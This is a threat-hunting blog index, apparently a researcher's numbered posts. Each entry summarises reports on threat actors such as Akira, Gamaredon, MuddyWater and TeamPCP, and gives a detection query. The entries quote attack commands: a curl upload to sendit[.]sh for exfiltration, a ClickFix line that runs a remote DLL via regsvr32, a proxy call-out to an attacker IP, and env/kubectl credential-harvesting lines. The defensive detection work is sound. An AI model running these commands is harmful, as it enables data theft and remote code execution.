Posts

396. Another Cloud Storage Abused by Akira Affiliates for Exfiltration

Hello everyone! To be honest, after nearly 400 posts, finding something interesting in public reports has become a bit more challenging. Nevertheless, it’s still possible, and today we’ll once again talk about Exfiltration to Cloud Storage (T1567.002). This time, the post is sponsored by our partners at Akira, and the following excerpt from a report caught my attention:

“Next, the threat actor used the Microsoft Edge browser to access Bing, and search for the term ‘eayupload’ before settling on Easyupload.io, a website that provides access to file uploads via drag-and-drop.”

As you can see, the attackers used yet another cloud storage service to upload the data they had collected. Access to such services can be proactively blocked, or you can monitor for suspicious connections to them:

event_type: "dnsreq" AND dns_rname: "easyupload.io"

Attackers are increasingly relying on legitimate tools and services, so understanding exactly which ones they may use can become...

395. Using Folders Associated with Cloud Atlas for Threat Hunting

Hello everyone! In some cases threat actors use very interesting folders to drop the malware and tools they use - and these folders can be a great target for hunting! Let's look at an example. This time it's Cloud Atlas (Cloud Werewolf, Inception). If we look through the report, we can see that the adversary leveraged multiple interesting folders to store malicious files and tools, for example:

C:\Windows\ime
C:\Windows\System32\ime
C:\Windows\pla
C:\Windows\inf
C:\Windows\migration
C:\Windows\System32\timecontrolsvc
C:\Windows\SKB
C:\Windows\LiveKernelReports
C:\Windows\branding

As you can see, these folders are not very common for legitimate executables, so we can use this information to build our hunting query:

event_type: "processcreatewin" AND proc_file_path: ("Windows\\ime" OR "Windows\\System32\\ime" OR "Windows\\pla" OR "Windows\\inf" OR "Windows\\migration" OR "Windows\\System32\\timecontrolsvc" OR "Windows\\S...

394. Hunting for PySoxy: Another Tool Delivered via ClickFix

Hello everyone! Today we'll look at another tool delivered by threat actors via ClickFix. And this time it's a 10-year-old open-source Python SOCKS5 proxy - PySoxy. So, according to the ReliaQuest report, the adversary leveraged interactive PowerShell access to download Python tooling to C:\ProgramData. The following command was executed to run the tool:

python.exe b64.pyc -ssl -remote_port 443 -remote_ip 167.99.158[.]97

The tool was identified as PySoxy. As you can see, there are a few interesting command line parameters we can use to build a hunting query, for example:

event_type: "processcreatewin" AND cmdline: ("remote_port" AND "remote_ip")

See you soon!

393. Hunting for Recent Gamaredon Tactics, Techniques, and Procedures

Hello everyone! Today we’ll take a look at several procedures observed in relatively recent Gamaredon (Disastrous Werewolf, Primitive Bear, Armageddon, Shuckworm, Aqua Blizzard) campaigns. As before, the attackers used phishing emails for initial access. The emails contained archives exploiting the CVE-2025-8088 vulnerability in WinRAR. After successful exploitation, a malicious VBS file - for example, 1_13_4_1882_18.03.2026.vbs - was copied into %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\. We can search for suspicious VBS file creation events in this folder:

event_type: "filecreatewin" AND file_path: ("programs\\startup" AND *.vbs)

Next, the VBS file downloads a malicious HTA file from Cloudflare Workers. For example, we can look for wscript.exe communications with the corresponding domains:

event_type: "dnsreqwin" AND dns_rname: "workers.dev" AND proc_file_path: "wscript.exe"

The HTA file is downloaded into the %TEMP...

392. MuddyWater Abuses Sendit for Data Exfiltration

Hello everyone! I really enjoy spotting various legitimate services that attackers abuse. Today we’ll look at another such example within the context of the Exfiltration to Cloud Storage technique (T1567.002). According to this report, MuddyWater (Nebulous Werewolf, Seedworm, TEMP.Zagros, Static Kitten, Mercury, TA450, Cobalt Ulster, Earth Vetala, Mango Sandstorm, Boggy Serpens) abused the sendit[.]sh service for data exfiltration. The service allows uploading files up to 10 GB using the command line:

curl.exe -F "file=@C:\Windows\Temp\<artifact>" hxxps://sendit[.]sh

As with other similar services, you can look for suspicious communications with it - for example, outbound connections initiated by cURL:

event_type: "dnsreqwin" AND dns_rname: "sendit.sh" AND proc_file_path: "curl.exe"

See you soon!

391. Hunting for TeamPCP's Stealer

Hello everyone! What do I know about stealers? They seem to be very noisy! And today, we’ll once again see that in action using TeamPCP (Haze Wolf) as an example. This time, the stealer was implanted by attackers into three versions of the xinference package (2.6.0, 2.6.1, and 2.6.2). Essentially, it collects SSH keys, various credentials, environment variables, crypto wallets, and much more, then uses cURL for exfiltration. Let’s take a look at a couple of techniques the attackers used to obtain credentials. For example, they were interested in data stored in environment variables:

env | grep AWS_
env | grep -i google
env | grep -i gcloud
env | grep -i azure

This looks fairly suspicious from a detection perspective:

event_type: processcreate* AND proc_file_path: "env" AND cmdline: ("grep" AND ("aws_" OR "google" OR "azure" OR "gcloud"))

Another technique was abusing kubectl to obtain credentials:

kubectl get secrets --all-n...

390. A New ClickFix Variant Abuses Cmdkey

Hello everyone! Today we’re going to look at another interesting variation of the Malicious Copy and Paste technique (T1204.004). This time, according to the report, the attackers prompted the victim to run the following command:

C:\WINDOWS\system32\cmd.exe /c cmdkey /add:151.245.195[.]142 /user:guest && start regsvr32 /s \\151.245.195[.]142\hi\demo.dll & REM I am not a robot – Cloudflare ID: d7f5a3335794c434

As you can see, before registering a malicious library from a remote server using regsvr32.exe, the attackers use cmdkey.exe to store credentials for accessing that server. And yes, abusing cmdkey.exe can be a good hunting opportunity - we can look for suspicious events where credentials are added to the Windows Credential Manager:

event_type: "processcreatewin" AND proc_file_path: "cmdkey.exe" AND cmdline: "add"

See you soon!